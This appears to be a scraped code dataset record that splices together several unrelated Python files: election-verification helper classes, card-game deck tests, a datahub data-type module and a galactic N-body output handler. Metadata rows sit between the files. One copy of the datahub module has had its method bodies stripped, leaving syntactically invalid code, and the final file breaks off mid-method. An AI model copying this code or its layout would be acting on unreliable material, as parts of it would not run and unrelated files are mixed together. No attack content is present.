T: TypeVar = TypeVar('T')
class Invariants():
    """Represents a series of conditions that must all hold for the
    collection of invariants to remain valid."""
    title: str
    conditions: dict[str, bool]

    def __init__(self, title: str):
        """Instantiate a new set of invariants collectively labelled `title`."""
        self.title = title
        self.conditions = {}

    def ensure(self, invariant: str, condition: bool) -> bool:
        """Track the truthiness of `condition` for the invariant labelled `invariant`."""
        # An invariant that has failed once stays failed, whatever comes later.
        self.conditions[invariant] = self.conditions.get(invariant, True) and condition
        return condition

    def validate(self) -> bool:
        """Return whether all conditions are valid, logging the results."""
        failed = [name for name, ok in self.conditions.items() if not ok]
        if not failed:
            info(f'[VALID]: {self.title}')
            return True
        info(f'[INVALID]: {self.title}')
        info(''.join(f'\t\tFailed to validate invariant {name}.\n' for name in failed))
        return False
class Contests():
    """Speeds up access to contest descriptions through object_id indexing."""
    contests: dict[str,ContestDescription]

    def __init__(self, description: ElectionDescription):
        """Indexes contest descriptions by object_id for quick lookups."""
        self.contests = {contest.object_id: contest for contest in description.contests}

    def __getitem__(self, contest: str) -> ContestDescription:
        """Returns the requested contest, or None if no such contest exists."""
        # dict.get already yields None for unknown ids — one lookup instead of two.
        return self.contests.get(contest)
class Guardians():
    """Speeds up access to guardians through owner_id indexing."""
    guardians: dict[str,CoefficientValidationSet]

    def __init__(self, guardians: Iterable[CoefficientValidationSet]):
        """Indexes guardians by owner_id for quick lookups."""
        self.guardians = {}
        for guardian in guardians:
            self.guardians[guardian.owner_id] = guardian

    # Fixed: the return annotation previously said ContestDescription (a
    # copy-paste from Contests); this container stores and returns
    # CoefficientValidationSet entries.
    def __getitem__(self, guardian: str) -> CoefficientValidationSet:
        """Returns the requested guardian, or None if no such guardian exists."""
        return self.guardians.get(guardian)
def get_first_el(els: list[T]) -> T:
    """Returns the first element of `els`, or None if it is empty."""
    return els[0] if els else None
def get_contest(ballot: CiphertextAcceptedBallot, contest_id: str) -> CiphertextBallotContest:
    """Given a ballot, gets the supplied contest. If the contest appears more than once,
    None is returned."""
    result: CiphertextBallotContest = None
    for contest in ballot.contests:
        if contest.object_id == contest_id:
            # Identity comparison (`is not None`) replaces `!= None`, per PEP 8.
            if result is not None:
                warn('Ballot contains multiple entries for the same contest.')
                return None
            result = contest
    return result
def get_selection(ballot: CiphertextAcceptedBallot, contest_id: str, selection_id: str) -> CiphertextBallotSelection:
    """Given a ballot, gets the supplied selection from within the supplied contest.
    If the contest or selection appear more than once, None is returned."""
    result: CiphertextBallotSelection = None
    contest: CiphertextBallotContest = get_contest(ballot, contest_id)
    if contest:
        for selection in contest.ballot_selections:
            if selection.object_id == selection_id:
                # Identity comparison (`is not None`) replaces `!= None`, per PEP 8.
                if result is not None:
                    warn('Ballot contains multiple entries for the same selection.')
                    return None
                result = selection
    return result
def warn(msg: str) -> None:
"""Emits a warning message `msg` to the logs."""
warning(f'[WARNING]: {msg}') | 0 | 0 | 0 |
911e3ee4e84c842b6e30a51754dbca2523df4215 | 8,608 | py | Python | tests/test_deck.py | lionel-panhaleux/krcg | 40238e2dababb23cdb1895221c58e81a0bf8c21d | [
"MIT"
] | 6 | 2020-05-05T18:59:20.000Z | 2021-10-11T12:19:45.000Z | tests/test_deck.py | lionel-panhaleux/krcg | 40238e2dababb23cdb1895221c58e81a0bf8c21d | [
"MIT"
] | 340 | 2020-04-15T08:19:29.000Z | 2022-03-31T09:59:19.000Z | tests/test_deck.py | lionel-panhaleux/krcg | 40238e2dababb23cdb1895221c58e81a0bf8c21d | [
"MIT"
] | 8 | 2020-05-05T16:10:50.000Z | 2021-07-21T00:16:11.000Z | import os
from krcg import deck
from krcg import twda
| 28.693333 | 87 | 0.520214 | import os
from krcg import deck
from krcg import twda
def test_cards():
    """A deck should iterate its cards as (name, count) pairs."""
    sample = deck.Deck()
    sample.update({"Fame": 3})
    assert [card for card in sample.cards()] == [("Fame", 3)]
def test_cards_count():
    """cards_count() should sum the copy counts across all cards."""
    sample = deck.Deck()
    sample.update({"Fame": 3, "Bum's Rush": 10, "Crusher": 4})
    assert sample.cards_count() == 3 + 10 + 4
def test_deck_display():
TWDA = twda._TWDA()
with open(os.path.join(os.path.dirname(__file__), "2010tcdbng.html")) as f:
TWDA.load_html(f)
assert len(TWDA) == 1
assert (
TWDA["2010tcdbng"].to_txt(format="twd")
== """Trading Card Day
Bad Naumheim, Germany
May 8th 2010
2R+F
10 players
Rudolf Scholz
-- 4vp in the final
Deck Name: The Storage Procurers
Description: Allies with Flash Grenades to keep troubles at bay.
Storage Annex for card efficiency and a structured hand. Weenies and
Midcaps with Obfuscate and/or Dominate to oust via Conditionings and
Deflections.
Crypt (12 cards, min=7, max=24, avg=3.75)
-----------------------------------------
1x Gilbert Duane 7 AUS DOM OBF prince Malkavian:1
1x Mariel, Lady Thunder 7 DOM OBF aus tha Malkavian:1
1x Badr al-Budur 5 OBF cel dom qui Banu Haqim:2
1x Count Ormonde 5 OBF dom pre ser Ministry:2
1x Didi Meyers 5 DOM aus cel obf Malkavian:1
1x Zebulon 5 OBF aus dom pro Malkavian:1
1x Dimple 2 obf Nosferatu:1
1x Mustafa Rahman 2 dom Tremere:2
1x Normal 2 obf Malkavian:1
1x Ohanna 2 dom Malkavian:2
1x Samson 2 dom Ventrue antitribu:2
1x Basil 1 obf Pander:2
Library (87 cards)
Master (19; 3 trifle)
1x Channel 10
2x Charisma
1x Creepshow Casino
1x KRCG News Radio
2x Perfectionist
6x Storage Annex -- great card! usually underestimated
3x Sudden Reversal
3x Vessel
Ally (12)
1x Carlton Van Wyk
1x Gregory Winter
1x Impundulu
1x Muddled Vampire Hunter
1x Ossian
6x Procurer
1x Young Bloods
Equipment (9)
1x Deer Rifle
8x Flash Grenade -- brings fear to the methuselahs rather than to minions
Action Modifier (19)
6x Cloak the Gathering
7x Conditioning -- should be more!
2x Lost in Crowds
4x Veil the Legions
Reaction (16)
7x Deflection
2x Delaying Tactics
7x On the Qui Vive
Combat (8)
8x Concealed Weapon
Event (4)
1x FBI Special Affairs Division
1x Hunger Moon
1x Restricted Vitae
1x Unmasking, The"""
)
assert (
TWDA["2010tcdbng"].to_txt(format="jol")
== """1x Gilbert Duane
1x Mariel, Lady Thunder
1x Badr al-Budur
1x Count Ormonde
1x Didi Meyers
1x Zebulon
1x Dimple
1x Mustafa Rahman
1x Normal
1x Ohanna
1x Samson
1x Basil
1x Channel 10
2x Charisma
1x Creepshow Casino
1x KRCG News Radio
2x Perfectionist
6x Storage Annex
3x Sudden Reversal
3x Vessel
1x Carlton Van Wyk
1x Gregory Winter
1x Impundulu
1x Muddled Vampire Hunter
1x Ossian
6x Procurer
1x Young Bloods
1x Deer Rifle
8x Flash Grenade
6x Cloak the Gathering
7x Conditioning
2x Lost in Crowds
4x Veil the Legions
7x Deflection
2x Delaying Tactics
7x On the Qui Vive
8x Concealed Weapon
1x FBI Special Affairs Division
1x Hunger Moon
1x Restricted Vitae
1x Unmasking, The"""
)
assert (
TWDA["2010tcdbng"].to_txt(format="lackey")
== """1 Channel 10
2 Charisma
1 Creepshow Casino
1 KRCG News Radio
2 Perfectionist
6 Storage Annex
3 Sudden Reversal
3 Vessel
1 Carlton Van Wyk
1 Gregory Winter
1 Impundulu
1 Muddled Vampire Hunter
1 Ossian
6 Procurer
1 Young Bloods
1 Deer Rifle
8 Flash Grenade
6 Cloak the Gathering
7 Conditioning
2 Lost in Crowds
4 Veil the Legions
7 Deflection
2 Delaying Tactics
7 On the Qui Vive
8 Concealed Weapon
1 FBI Special Affairs Division
1 Hunger Moon
1 Restricted Vitae
1 Unmasking, The
Crypt:
1 Gilbert Duane
1 Mariel, Lady Thunder
1 Badr al-Budur
1 Count Ormonde
1 Didi Meyers
1 Zebulon
1 Dimple
1 Mustafa Rahman
1 Normal
1 Ohanna
1 Samson
1 Basil"""
)
def test_from_amaranth():
d = deck.Deck.from_amaranth("4d3aa426-70da-44b7-8cb7-92377a1a0dbd")
assert d.to_json() == {
"id": "4d3aa426-70da-44b7-8cb7-92377a1a0dbd",
"date": "2020-12-28",
"name": "First Blood: Tremere",
"author": "BCP",
"comments": (
"https://blackchantry.com/"
"How%20to%20play%20the%20First%20Blood%20Tremere%20deck.pdf"
),
"crypt": {
"count": 12,
"cards": [
{"id": 201020, "count": 2, "name": "Muhsin Samir"},
{"id": 201213, "count": 2, "name": "Rutor"},
{"id": 201388, "count": 2, "name": "Troius"},
{"id": 201501, "count": 2, "name": "Zane"},
{"id": 200025, "count": 2, "name": "Aidan Lyle"},
{"id": 200280, "count": 2, "name": "Claus Wegener"},
],
},
"library": {
"count": 86,
"cards": [
{
"type": "Master",
"count": 9,
"cards": [
{"id": 100015, "count": 1, "name": "Academic Hunting Ground"},
{"id": 100081, "count": 1, "name": "Arcane Library"},
{"id": 100199, "count": 4, "name": "Blood Doll"},
{"id": 100329, "count": 1, "name": "Chantry"},
{"id": 102092, "count": 2, "name": "Vast Wealth"},
],
},
{
"type": "Action",
"count": 12,
"cards": [
{"id": 100845, "count": 12, "name": "Govern the Unaligned"}
],
},
{
"type": "Ally",
"count": 1,
"cards": [{"id": 101963, "count": 1, "name": "Thadius Zho"}],
},
{
"type": "Equipment",
"count": 7,
"cards": [
{"id": 100001, "count": 4, "name": ".44 Magnum"},
{"id": 101014, "count": 1, "name": "Ivory Bow"},
{"id": 101856, "count": 2, "name": "Sport Bike"},
],
},
{
"type": "Retainer",
"count": 1,
"cards": [{"id": 100335, "count": 1, "name": "Charnas the Imp"}],
},
{
"type": "Action Modifier",
"count": 6,
"cards": [{"id": 100236, "count": 6, "name": "Bonding"}],
},
{
"type": "Reaction",
"count": 30,
"cards": [
{"id": 100644, "count": 4, "name": "Enhanced Senses"},
{"id": 100760, "count": 5, "name": "Forced Awakening"},
{"id": 101321, "count": 5, "name": "On the Qui Vive"},
{"id": 101475, "count": 4, "name": "Precognition"},
{"id": 101850, "count": 4, "name": "Spirit's Touch"},
{"id": 101949, "count": 8, "name": "Telepathic Misdirection"},
],
},
{
"type": "Combat",
"count": 20,
"cards": [
{"id": 100077, "count": 8, "name": "Apportation"},
{"id": 101966, "count": 10, "name": "Theft of Vitae"},
{"id": 102139, "count": 2, "name": "Walk of Flame"},
],
},
],
},
}
def test_deck_to_vdb():
    """The 2010tcdbng TWD fixture should serialize to a stable VDB share URL."""
    TWDA = twda._TWDA()
    # HTML fixture lives next to this test module.
    with open(os.path.join(os.path.dirname(__file__), "2010tcdbng.html")) as f:
        TWDA.load_html(f)
    assert len(TWDA) == 1
    # Cards are encoded as `id=count` pairs in the URL fragment.
    assert TWDA["2010tcdbng"].to_vdb() == (
        "https://vdb.smeea.casa/decks?name=The+Storage+Procurers&author=Rudolf+Scholz#"
        "200517=1;200929=1;200161=1;200295=1;200343=1;201503=1;200346=1;201027=1;"
        "201065=1;201073=1;201231=1;200173=1;100327=1;100332=2;100444=1;101067=1;"
        "101388=2;101877=6;101896=3;102113=3;100298=1;100855=1;100966=1;101250=1;"
        "101333=1;101491=6;102202=1;100516=1;100745=8;100362=6;100401=7;101125=2;"
        "102097=4;100518=7;100519=2;101321=7;100392=8;100709=1;100944=1;101614=1;"
        "102079=1"
    )
| 8,433 | 0 | 115 |
0c3e2c67bfe44f727a088c6f877154b8fbe9995e | 8,453 | py | Python | tordatahub/models/types.py | jasonz93/python-tordatahub | 3a9a497d5a0bebf915d7e24049dd8b06099e3c04 | [
"Apache-2.0"
] | null | null | null | tordatahub/models/types.py | jasonz93/python-tordatahub | 3a9a497d5a0bebf915d7e24049dd8b06099e3c04 | [
"Apache-2.0"
] | null | null | null | tordatahub/models/types.py | jasonz93/python-tordatahub | 3a9a497d5a0bebf915d7e24049dd8b06099e3c04 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import re
import time
import datetime
import decimal
from ..thirdparty import six
from .. import utils
class DataType(object):
    """
    Abstract data type
    """
    # NOTE(review): in this copy of the module every method body has been
    # mechanically stripped — the bare `@property` below decorates nothing
    # (a SyntaxError), and the primitive classes instantiated after it
    # (Bigint, Double, String, Timestamp, Boolean) are never defined here.
    # An intact copy of the same module appears later in this file.
    _singleton = True
    __slots__ = 'nullable',
    @property
    # Bigint
    # Double
    # String
    #Timestamp
    # Boolean
bigint = Bigint()
double = Double()
string = String()
timestamp = Timestamp()
boolean = Boolean()
# Name -> singleton-instance registry for the primitive types.
_datahub_primitive_data_types = dict(
    [(t.name, t) for t in (
        bigint, double, string, timestamp, boolean
    )]
)
# Builtin Python types acceptable for each primitive; extended with numpy
# scalar types when numpy is importable.
integer_builtins = six.integer_types
float_builtins = (float,)
try:
    import numpy as np
    integer_builtins += (np.integer,)
    # NOTE(review): np.float was removed in numpy 1.24 — on modern numpy this
    # line raises AttributeError (not caught by the ImportError handler).
    float_builtins += (np.float,)
except ImportError:
    pass
_datahub_primitive_to_builtin_types = {
    bigint: integer_builtins,
    double: float_builtins,
    string: six.string_types,
    timestamp: integer_builtins,
    boolean: bool
    }
| 28.176667 | 95 | 0.659293 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import re
import time
import datetime
import decimal
from ..thirdparty import six
from .. import utils
class DataType(object):
    """
    Abstract data type
    """
    _singleton = True
    __slots__ = 'nullable',
    def __new__(cls, *args, **kwargs):
        # Singleton types share one instance per class; the class hash is
        # cached so instances can serve as dict keys (see
        # _datahub_primitive_to_builtin_types at module level).
        if cls._singleton:
            if not hasattr(cls, '_instance'):
                cls._instance = object.__new__(cls)
                cls._hash = hash(cls)
            return cls._instance
        else:
            return object.__new__(cls)
    def __init__(self, nullable=True):
        # Whether None is an acceptable value for this type.
        self.nullable = nullable
    def __call__(self, nullable=True):
        """Calling an instance produces a (possibly non-nullable) variant."""
        return self._factory(nullable=nullable)
    def _factory(self, nullable=True):
        return type(self)(nullable=nullable)
    def __ne__(self, other):
        return not (self == other)
    def __eq__(self, other):
        return self._equals(other)
    def _equals(self, other):
        """Equal when nullability matches and the types coincide (or `other`
        is a subtype); `other` may also be given by name."""
        if self is other:
            return True
        other = validate_data_type(other)
        if self.nullable != other.nullable:
            return False
        if type(self) == type(other):
            return True
        return isinstance(other, type(self))
    def __hash__(self):
        # NOTE(review): _hash is only set for singleton classes in __new__; a
        # non-singleton subclass instance would raise AttributeError here.
        return self._hash
    @property
    def name(self):
        """Lower-cased class name, e.g. 'bigint'."""
        return type(self).__name__.lower()
    def __repr__(self):
        if self.nullable:
            return self.name
        return '{0}[non-nullable]'.format(self.name)
    def __str__(self):
        return self.name.upper()
    def can_implicit_cast(self, other):
        """True if values of `other` (a DataType or its name) implicitly cast to self."""
        if isinstance(other, six.string_types):
            other = validate_data_type(other)
        return isinstance(self, type(other))
    def can_explicit_cast(self, other):
        return self.can_implicit_cast(other)
    def validate_value(self, val):
        # directly return True means without checking
        return True
    def _can_cast_or_throw(self, value, data_type):
        # Raise when an implicit cast from data_type to this type is illegal.
        if not self.can_implicit_cast(data_type):
            raise ValueError('Cannot cast value(%s) from type(%s) to type(%s)' % (
                value, data_type, self))
    def cast_value(self, value, data_type):
        """Cast `value` (of `data_type`) to this type; subclasses must override."""
        raise NotImplementedError
class DatahubPrimitive(DataType):
    """Marker base class for all scalar Datahub field types."""
    __slots__ = ()
# Bigint
class Bigint(DatahubPrimitive):
    """64-bit signed integer type."""
    __slots__ = ()
    _bounds = (-9223372036854775808, 9223372036854775807)

    def can_implicit_cast(self, other):
        if isinstance(other, six.string_types):
            other = validate_data_type(other)
        return isinstance(other, (Double, String, Timestamp)) or \
            super(Bigint, self).can_implicit_cast(other)

    def validate_value(self, val):
        if val is None and self.nullable:
            return True
        lower, upper = self._bounds
        if not (lower <= val <= upper):
            raise ValueError('InvalidData: Bigint(%s) out of range' % val)
        return True

    def cast_value(self, value, data_type):
        self._can_cast_or_throw(value, data_type)
        return int(value)
# Double
class Double(DatahubPrimitive):
    """Double-precision floating point type."""
    __slots__ = ()

    def can_implicit_cast(self, other):
        if isinstance(other, six.string_types):
            other = validate_data_type(other)
        return isinstance(other, (Bigint, String)) or \
            super(Double, self).can_implicit_cast(other)

    def cast_value(self, value, data_type):
        self._can_cast_or_throw(value, data_type)
        return float(value)
# String
class String(DatahubPrimitive):
    """Text type, limited to 1 MB."""
    __slots__ = ()
    _max_length = 1 * 1024 * 1024  # 1M

    def can_implicit_cast(self, other):
        if isinstance(other, six.string_types):
            other = validate_data_type(other)
        return isinstance(other, (Bigint, Double, Timestamp)) or \
            super(String, self).can_implicit_cast(other)

    def validate_value(self, val):
        if val is None and self.nullable:
            return True
        if len(val) > self._max_length:
            raise ValueError("InvalidData: Length of string(%s) is more than 1M.'" % val)
        return True

    def cast_value(self, value, data_type):
        self._can_cast_or_throw(value, data_type)
        return utils.to_text(value)
#Timestamp
class Timestamp(DatahubPrimitive):
    """Timestamp type, stored as integer ticks within a fixed range."""
    __slots__ = ()
    _ticks_bound = (-62135798400000000, 253402271999000000)

    def can_implicit_cast(self, other):
        if isinstance(other, six.string_types):
            other = validate_data_type(other)
        return isinstance(other, String) or \
            super(Timestamp, self).can_implicit_cast(other)

    def validate_value(self, val):
        if val is None and self.nullable:
            return True
        lower, upper = self._ticks_bound
        if not (lower <= val <= upper):
            raise ValueError('InvalidData: Timestamp(%s) out of range' % val)
        return True

    def cast_value(self, value, data_type):
        self._can_cast_or_throw(value, data_type)
        return int(value)
# Boolean
class Boolean(DatahubPrimitive):
    """Boolean type; accepts the strings 'true'/'false' in any letter case."""
    __slots__ = ()

    def cast_value(self, value, data_type):
        if isinstance(data_type, six.string_types):
            data_type = validate_data_type(data_type)
        if isinstance(data_type, String):
            lowered = value.lower()
            if lowered == 'true':
                return True
            if lowered == 'false':
                return False
        self._can_cast_or_throw(value, data_type)
        return value
bigint = Bigint()
double = Double()
string = String()
timestamp = Timestamp()
boolean = Boolean()
_datahub_primitive_data_types = dict(
[(t.name, t) for t in (
bigint, double, string, timestamp, boolean
)]
)
def validate_data_type(data_type):
    """Resolve `data_type` (a DataType instance or its name) to a DataType."""
    if isinstance(data_type, DataType):
        return data_type
    if isinstance(data_type, six.string_types):
        resolved = _datahub_primitive_data_types.get(data_type.lower())
        if resolved is not None:
            return resolved
    raise ValueError('Invalid data type: %s' % repr(data_type))
integer_builtins = six.integer_types
float_builtins = (float,)
try:
import numpy as np
integer_builtins += (np.integer,)
float_builtins += (np.float,)
except ImportError:
pass
_datahub_primitive_to_builtin_types = {
bigint: integer_builtins,
double: float_builtins,
string: six.string_types,
timestamp: integer_builtins,
boolean: bool
}
def infer_primitive_data_type(value):
    """Return the first primitive DataType whose builtin types match `value`,
    or None when nothing matches. Registry order is significant (e.g. bool is
    an int subclass, so ordering decides which type wins)."""
    return next(
        (data_type
         for data_type, builtin_types in six.iteritems(_datahub_primitive_to_builtin_types)
         if isinstance(value, builtin_types)),
        None,
    )
def _validate_primitive_value(value, data_type):
    """Normalize value for data_type, casting when the runtime types differ.

    None passes through; raw bytes are decoded as UTF-8 first.
    """
    if value is None:
        return None
    normalized = value
    if isinstance(normalized, (bytearray, six.binary_type)):
        normalized = normalized.decode('utf-8')
    accepted = _datahub_primitive_to_builtin_types[data_type]
    if isinstance(normalized, accepted):
        return normalized
    source_type = infer_primitive_data_type(normalized)
    if source_type is None:
        raise ValueError(
            'Unknown value type, cannot infer from value: %s, type: %s' % (normalized, type(normalized)))
    return data_type.cast_value(normalized, source_type)
def validate_value(value, data_type):
    """Validate value against data_type and return the normalized value."""
    if data_type not in _datahub_primitive_to_builtin_types:
        raise ValueError('Unknown data type: %s' % data_type)
    normalized = _validate_primitive_value(value, data_type)
    data_type.validate_value(normalized)
    return normalized
| 5,369 | 664 | 656 |
9716ba57dde39ce137fcb1254e0cd19d311a0194 | 17,674 | py | Python | build/lib/mwahpy/mwah_handle_output.py | thomasdonlon/mwahpy | 9bcba0a5f3042beeccf2a9d6ca98d63331e1bef6 | [
"MIT"
] | 3 | 2020-09-27T16:22:36.000Z | 2022-03-23T22:00:55.000Z | build/lib/mwahpy/mwah_handle_output.py | thomasdonlon/mwahpy | 9bcba0a5f3042beeccf2a9d6ca98d63331e1bef6 | [
"MIT"
] | null | null | null | build/lib/mwahpy/mwah_handle_output.py | thomasdonlon/mwahpy | 9bcba0a5f3042beeccf2a9d6ca98d63331e1bef6 | [
"MIT"
] | 1 | 2020-09-27T16:22:42.000Z | 2020-09-27T16:22:42.000Z | #purpose: to take output from a MW@h .out file and produce workable data/plots to look at the resulting output in meaningful ways
#this is still too hard-coded for my liking, but it'll have to do for now
#i.e. if you want to add new attributes to the data class then you manually have to go through and fix the appending functions
import matplotlib.pyplot as plt
import numpy as np
import coord_trans as ct
import astropy
from astropy.coordinates import SkyCoord
import astropy.units as u
import random
import galpy
from galpy.orbit import Orbit
from galpy.potential import HernquistPotential
from galpy.potential import LogarithmicHaloPotential
from galpy.potential import MiyamotoNagaiPotential
from galpy.potential import PlummerPotential
# Milky Way potential components (bulge + disk + halo) used for orbit energies.
m_bulge = 3.4e10*u.solMass #solar masses
m_disk = 1.0e11*u.solMass
v_halo = 74.61*u.km/u.s #km/s
G = 6.67e-11*u.m**3/(u.kg*u.s**2)
pot_bulge = HernquistPotential(amp=2*m_bulge, a=0.7*u.kpc, ro=8., vo=220.)
pot_disk = MiyamotoNagaiPotential(amp=G*m_disk, a=6.5*u.kpc, b=0.26*u.kpc, ro=8., vo=220.)
pot_halo = LogarithmicHaloPotential(amp=2*v_halo**2, q=1., core=12.0*u.kpc, ro=8., vo=220.)
pot = [pot_bulge, pot_disk, pot_halo]
# Plummer-sphere parameters for the progenitor dwarf (used by Data.initial_energy).
m_plummer = 1e9*u.solMass
r_scale_plummer = 3*u.kpc
plummer_pot = PlummerPotential(amp=G*m_plummer, b=r_scale_plummer, ro=10*u.kpc, vo=20*u.km/u.s)
struct_to_sol = 222288.47 #this many solar masses make up one structural mass unit (the output of mwah)
#data.plot(d1='var1', d2='var2'): data, str, str -> plot
#takes in the 2 coordinates of the data you want to plot and plots them in a 2d scatter plot
#sticks a big fat red dot wherever the specific star is, given an id
#data.hist(d='r'): data, str -> histogram plot
#takes in the coordinate of the data you want in your histogram and then produces the relevant plot
#read_output(f): filename -> data class
#reads a milky way at home output file and turns it into a data class
#subset(data): data_object -> data_object
#takes in a data object and outputs a cut data object. Can cut within some radius or a rectangle cut. Can specify the axes, or if there is only 1 axis.
| 44.518892 | 266 | 0.581928 | #purpose: to take output from a MW@h .out file and produce workable data/plots to look at the resulting output in meaningful ways
#this is still too hard-coded for my liking, but it'll have to do for now
#i.e. if you want to add new attributes to the data class then you manually have to go through and fix the appending functions
import matplotlib.pyplot as plt
import numpy as np
import coord_trans as ct
import astropy
from astropy.coordinates import SkyCoord
import astropy.units as u
import random
import galpy
from galpy.orbit import Orbit
from galpy.potential import HernquistPotential
from galpy.potential import LogarithmicHaloPotential
from galpy.potential import MiyamotoNagaiPotential
from galpy.potential import PlummerPotential
m_bulge = 3.4e10*u.solMass #solar masses
m_disk = 1.0e11*u.solMass
v_halo = 74.61*u.km/u.s #km/s
G = 6.67e-11*u.m**3/(u.kg*u.s**2)
pot_bulge = HernquistPotential(amp=2*m_bulge, a=0.7*u.kpc, ro=8., vo=220.)
pot_disk = MiyamotoNagaiPotential(amp=G*m_disk, a=6.5*u.kpc, b=0.26*u.kpc, ro=8., vo=220.)
pot_halo = LogarithmicHaloPotential(amp=2*v_halo**2, q=1., core=12.0*u.kpc, ro=8., vo=220.)
pot = [pot_bulge, pot_disk, pot_halo]
m_plummer = 1e9*u.solMass
r_scale_plummer = 3*u.kpc
plummer_pot = PlummerPotential(amp=G*m_plummer, b=r_scale_plummer, ro=10*u.kpc, vo=20*u.km/u.s)
struct_to_sol = 222288.47 #this many solar masses make up one structural nass unit (the output of mwah)
class Data():
    """One snapshot of MW@h N-body output.

    Holds parallel per-star numpy arrays plus derived quantities (sky
    coordinates, angular momenta, orbital energy, ...) exposed by name
    through ``array_dict`` for plotting and selection.
    """
    def __init__(self, id_val=[], x=[], y=[], z=[], l=[], b=[], r=[], vx=[], vy=[], vz=[], mass=[], vlos=[], centerOfMass=[], centerOfMomentum=[], pot_offset=0):
        #these should all be lists of floats
        # NOTE(review): mutable default arguments are shared between calls;
        # they are never mutated here, so this is benign but fragile.
        self.id = np.array(id_val)
        self.x = np.array(x)
        self.y = np.array(y)
        self.z = np.array(z)
        self.l = np.array(l)
        self.b = np.array(b)
        self.r = np.array(r)
        self.vx = np.array(vx)
        self.vy = np.array(vy)
        self.vz = np.array(vz)
        self.mass = np.array(mass)
        self.vlos = np.array(vlos)
        self.centerOfMass = centerOfMass
        self.centerOfMomentum = centerOfMomentum
        # Structure mass units -> solar masses.
        self.msol = self.mass * struct_to_sol
        # Equatorial coordinates derived from galactic (l, b).
        c = SkyCoord(l=self.l*u.degree, b=self.b*u.degree, frame='galactic')
        c_trans = c.transform_to('icrs')
        self.ra = c_trans.ra.degree
        self.dec = c_trans.dec.degree
        self.d = (self.x**2 + self.y**2 + self.z**2)**0.5 #TODO: correct d vs r
        self.vgsr = self.vlos + 10.1*np.cos(self.b*np.pi/180)*np.cos(self.l*np.pi/180) + 224*np.cos(self.b*np.pi/180)*np.sin(self.l*np.pi/180) + 6.7*np.sin(self.b*np.pi/180)
        self.rv, self.pmra, self.pmdec = ct.getrvpm(self.ra, self.dec, self.r, self.vx, self.vy, self.vz)
        self.pmtot = (self.pmra**2 + self.pmdec**2)**0.5
        #4.848e-6 is arcsec->rad, 3.086e16 is kpc->km, and 3.156e7 is sidereal yr -> seconds
        self.vtan = 4.74*self.r*self.pmtot #self.r*np.tan(self.pmtot*4.848e-6) * 3.086e16 / 3.156e7
        #get the angular momentum info
        self.lx = self.y * self.vz - self.z * self.vy
        # NOTE(review): sign convention here differs from the usual
        # Ly = z*vx - x*vz; presumably intentional — confirm against mwahpy.
        self.ly = self.x * self.vz - self.z * self.vx
        self.lz = self.x * self.vy - self.y * self.vx
        self.lperp = (self.lx**2 + self.ly**2)**0.5
        self.ltot = (self.lx**2 + self.ly**2 + self.lz**2)**0.5
        #galactocentric velocity information
        self.rad = (self.x*self.vx + self.y*self.vy + self.z*self.vz)/self.r
        self.rot = self.lz/(self.x**2 + self.y**2)**0.5
        #get the energy info
        PE = galpy.potential.evaluatePotentials(pot, (self.x**2 + self.y**2)**0.5 * u.kpc, self.z*u.kpc, ro=8., vo=220.) - pot_offset
        KE = 0.5*(self.vx**2 + self.vy**2 + self.vz**2)
        self.energy = PE + KE
        # Name -> array lookup used by plot()/hist()/subset().
        self.array_dict = {'id':self.id, 'x':self.x, 'y':self.y, 'z':self.z, 'l':self.l, 'b':self.b, 'r':self.r, 'vx':self.vx, \
                           'vy':self.vy, 'vz':self.vz, 'mass':self.mass, 'vtan':self.vtan, 'vlos':self.vlos, \
                           'msol':self.msol, 'ra':self.ra, 'dec':self.dec, 'd':self.d, 'vgsr':self.vgsr, \
                           'energy':self.energy, 'ltot':self.ltot, 'lz':self.lz, 'lperp':self.lperp, 'pmra':self.pmra, \
                           'pmdec':self.pmdec, 'rad':self.rad}
def cutFirstN(self, n):
self.id = self.id[n:]
self.x = self.x[n:]
self.y = self.y[n:]
self.z = self.z[n:]
self.l = self.l[n:]
self.b = self.b[n:]
self.r = self.r[n:]
self.vx = self.vx[n:]
self.vy = self.vy[n:]
self.vz = self.vz[n:]
self.mass = self.mass[n:]
self.vlos = self.vlos[n:]
self.msol = self.msol[n:]
self.ra = self.ra[n:]
self.dec = self.dec[n:]
self.d = self.d[n:]
self.vgsr = self.vgsr[n:]
self.vtan = self.vtan[n:]
self.lz = self.lz[n:]
self.lperp = self.lperp[n:]
self.energy = self.energy[n:]
self.pmra = self.pmra[n:]
self.pmdec = self.pmdec[n:]
self.rad = self.rad[n:]
self.updateArrayDict()
def cutLastN(self, n):
self.id = self.id[:len(self.rad) - n]
self.x = self.x[:len(self.rad) - n]
self.y = self.y[:len(self.rad) - n]
self.z = self.z[:len(self.rad) - n]
self.l = self.l[:len(self.rad) - n]
self.b = self.b[:len(self.rad) - n]
self.r = self.r[:len(self.rad) - n]
self.vx = self.vx[:len(self.rad) - n]
self.vy = self.vy[:len(self.rad) - n]
self.vz = self.vz[:len(self.rad) - n]
self.mass = self.mass[:len(self.rad) - n]
self.vlos = self.vlos[:len(self.rad) - n]
self.msol = self.msol[:len(self.rad) - n]
self.ra = self.ra[:len(self.rad) - n]
self.dec = self.dec[:len(self.rad) - n]
self.d = self.d[:len(self.rad) - n]
self.vgsr = self.vgsr[:len(self.rad) - n]
self.vtan = self.vtan[:len(self.rad) - n]
self.lz = self.lz[:len(self.rad) - n]
